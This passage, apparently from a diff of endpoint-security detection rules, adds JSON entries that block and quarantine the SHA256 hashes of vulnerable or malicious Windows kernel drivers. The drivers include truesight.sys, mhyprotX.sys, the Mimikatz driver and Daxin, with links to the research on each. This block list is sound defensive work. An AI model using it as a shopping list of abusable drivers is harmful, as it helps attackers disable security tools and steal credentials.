"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977072Z", + "creation_date": "2026-03-23T11:45:29.977074Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977079Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f744abb99c97d98e4cd08072a897107829d6d8481aee96c22443f626d00f4145", + "comment": "HP Hardware Diagnostic's EtdSupp vulnerable driver (aka etdsupp.sys) 
[https://github.com/alfarom256/HPHardwareDiagnostics-PoC] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b6b6d27f-e0de-5bc8-adde-76f77f6928bf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.612232Z", + "creation_date": "2026-03-23T11:45:29.612234Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.612239Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7bfa54943180e34aea390a8f63a2cb007cf53c336dff697c60a79103f3c0c19d", + "comment": "Genshin Impact vulnerable driver (aka mhyprotX.sys) [https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b6c3acaf-dcbe-5582-9714-e38769d84f4b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604482Z", + "creation_date": 
"2026-03-23T11:45:29.604484Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604489Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5b4f59236a9b950bcd5191b35d19125f60cfb9e1a1e1aa2e4f914b6745dde9df", + "comment": "Vulnerable Kernel Driver (aka STProcessMonitor.sys) [https://github.com/ANYLNK/STProcessMonitorBYOVD/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b6cc106e-0e47-5024-8c3b-3d5e8df07ad2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811561Z", + "creation_date": "2026-03-23T11:45:31.811563Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811568Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d27b53a93330abe2ba2fd0c93a1caa1a55e79cb8ece3eb0b38653712ef82272f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b6eaf652-d31f-528f-ad0a-5d2dac9af4f1", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.152986Z", + "creation_date": "2026-03-23T11:45:31.152990Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.152998Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9253b82646dd6767c9bbbdcf036643b83d6e3ac046b869604b300c342636af27", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b6fd03d8-d637-5f1a-bb3e-6e94129a6169", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.826479Z", + "creation_date": "2026-03-23T11:45:30.826481Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:30.826486Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6e452b924f08462338446dd707dd56a8b1da279ca503006bc981884206d7c5fb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b7002c98-6ee6-5a56-8e54-2367ff063bbf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.473475Z", + "creation_date": "2026-03-23T11:45:31.473479Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.473489Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4afbf265692579b3b771883308cd632f722feb86ee5fb9689eb7120f4749e221", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b705e0f9-0f2f-5294-90a0-52c6b8dbdd26", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.812320Z", + "creation_date": "2026-03-23T11:45:31.812324Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.812334Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c81ac49bf30708098f785a712fd922f72284c1c44922afaebbe42f4e8f1de6cf", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b706e6ad-8f93-50af-98ce-d80686847612", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810955Z", + "creation_date": "2026-03-23T11:45:31.810957Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810962Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "57e7fee32f356edbbe3911f708f3a578fd28895597cf661d76fb5ea8500cee52", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b7134e9b-239d-52c4-acf1-c2bcc9dd5fd0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.481804Z", + "creation_date": "2026-03-23T11:45:30.481806Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.481812Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7c8ad57b3a224fdc2aac9dd2d7c3624f1fcd3542d4db804de25a90155657e2cc", + "comment": "Vulnerable Kernel Driver (aka RadHwMgr.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b72374d9-a834-5185-a05a-61f85f435328", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.622280Z", + "creation_date": "2026-03-23T11:45:29.622282Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.622287Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9778136d2441439dc470861d15d96fa21dc9f16225232cd05b76791a5e0fde6f", + "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b727055a-75af-578d-b473-974c5fd00335", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.819016Z", + "creation_date": "2026-03-23T11:45:31.819020Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.819028Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a984513c456cb68749afba1fe16be4b2e10b0f30761e95165f1217bdfbe682b5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware 
Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b72ae010-2ad2-5735-b348-b95ec3ed4bab", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605249Z", + "creation_date": "2026-03-23T11:45:29.605251Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.605256Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "29f611e5189e8a1b1c8e5534bdafa617f679097a54dd4f91af3dc8922e668e04", + "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b72eaff8-1c6f-5c90-9338-f97017d4669a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.608155Z", + "creation_date": "2026-03-23T11:45:29.608157Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608162Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3026a7202354b9b1300215cf0288f34ffb99098a0a2fcd96fbad0987182a99cf", + "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b734d229-477c-5c29-ace9-bd065d675680", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142109Z", + "creation_date": "2026-03-23T11:45:31.142111Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142117Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "50f528b63af1ffa45d6a7f0a60b4170de2785575cc58b79c28831699b346462a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b7470c30-eb55-5e04-8e2a-576b4a8fce1e", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.970755Z", + "creation_date": "2026-03-23T11:45:29.970758Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.970766Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4297641b1127248815ceb5e06dc0f6c5121e73f2fa91fe573a7c6f8dac66745e", + "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b7492c3f-b3da-5565-8f9b-0e77dc96b321", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.985648Z", + "creation_date": "2026-03-23T11:45:29.985650Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.985656Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": 
null, + "references": [], + "type": "hash", + "value": "1485c0ed3e875cbdfc6786a5bd26d18ea9d31727deb8df290a1c00c780419a4e", + "comment": "Malicious Kernel Driver related to WINTAPIX (aka WinTapix.sys and SRVNET2.SYS) [https://www.fortinet.com/blog/threat-research/wintapix-kernal-driver-middle-east-countries] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b74b620f-f7ab-5f2b-8b07-26b3091444c1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810847Z", + "creation_date": "2026-03-23T11:45:31.810849Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810854Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "36e590d5d123f8bfd652fb6cdafcde6634d7c139a7ccf51b0ee1f5fda41b3abb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b752a679-23c1-575c-af19-d467679e6e54", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.145129Z", + "creation_date": "2026-03-23T11:45:31.145131Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.145137Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c1154d885751e694cff686db2d65497d113e607eef765e555076a4462b54b636", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b7589b6b-f256-5e5a-8334-6db2c20276b8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611218Z", + "creation_date": "2026-03-23T11:45:29.611220Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.611225Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d4e93f592a8342b0eb582d24a114348ce40ecb3c1e7b238d731b02e17d5aae7d", + "comment": 
"CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b7604fc2-c79f-52d0-abd9-203185cf065e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.154299Z", + "creation_date": "2026-03-23T11:45:31.154300Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.154306Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "967b7ba007fa14fb9309de521189c7fb5dc2215b958c2fd905605106278d7600", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b76e3d53-45aa-5d77-ace5-24b299698aa2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", 
+ "last_update": "2026-03-23T11:45:31.158800Z", + "creation_date": "2026-03-23T11:45:31.158803Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.158809Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4479cf843b70d11708e9763ec7e49d228fbd16205955306f5400f5af1558a2ec", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b7724d1e-7256-5a18-a40e-fd790edf2181", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983140Z", + "creation_date": "2026-03-23T11:45:29.983142Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.983147Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "49c827cf48efb122a9d6fd87b426482b7496ccd4a2dbca31ebbf6b2b80c98530", + "comment": "Malicious Kernel Driver (aka daxin_blank.sys) [https://www.loldrivers.io/drivers/7e80423f-8b30-4ee2-b904-9f5421826a8c/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b7859ea6-fad4-503d-812f-41295bc7890a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973585Z", + "creation_date": "2026-03-23T11:45:29.973587Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.973593Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3fa6379951f08ed3cb87eeba9cf0c5f5e1d0317dcfcf003b810df9d795eeb73e", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b78b6ac2-b396-5a67-b46e-66cca85a2b3b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827543Z", + "creation_date": "2026-03-23T11:45:30.827545Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
